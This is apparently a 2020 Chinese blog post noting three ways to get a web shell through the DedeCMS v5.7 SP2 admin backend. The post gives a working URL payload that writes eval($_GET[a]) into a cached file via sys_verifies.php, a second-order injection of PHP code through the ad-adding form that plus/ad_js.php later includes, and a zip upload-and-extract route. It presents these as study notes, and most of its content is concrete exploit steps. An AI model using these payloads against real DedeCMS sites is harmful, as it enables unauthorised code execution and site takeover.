dedecms v5.7 sp2 三处经典后台getshell

1、通过fopen/fwrite配合require_once文件包含进行getshell

D:\phpstudy_pro\WWW\dede\dede\sys_verifies.php

payload:http://dede.com/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//

此处进行文件包含,最终导致getshell

http://dede.com/dede/sys_verifies.php?action=down&a=echo 'zpchcbd';

类似的漏洞还有:D:\phpstudy_pro\WWW\dede\dede\stepselect_main.php 中的WriteEnumsCache函数

2、二次注入导致的getshell

D:\phpstudy_pro\WWW\dede\dede\ad_add.php

进行广告添加的时候,其中$normbody变量是我们可以可控,这里直接写入的内容为--><?php phpinfo()?><!--

后面发现会进行取出,如果看从哪里取出呢?全局搜索#@__myad,这个表的相关操作

D:\phpstudy_pro\WWW\dede\plus\ad_js.php,发现在这会进行取出,并且进行文件包含,--> <!-- 就是为了闭合操作

然后访问:http://dede.com/plus/ad_js.php?aid=3,这里我的广告id为3

直接命令执行

3、压缩包上传解压导致的getshell

随意上传一个附件:http://dede.com/uploads/soft/200420/1_2312144661.zip

访问:http://dede.com/dede/album_add.php,进行解压操作!

这三种都是经典的后台getshell的方法,在这里学习记录下!

posted @ 2020-04-20 23:11  zpchcbd  阅读(3410)  评论(0编辑  收藏  举报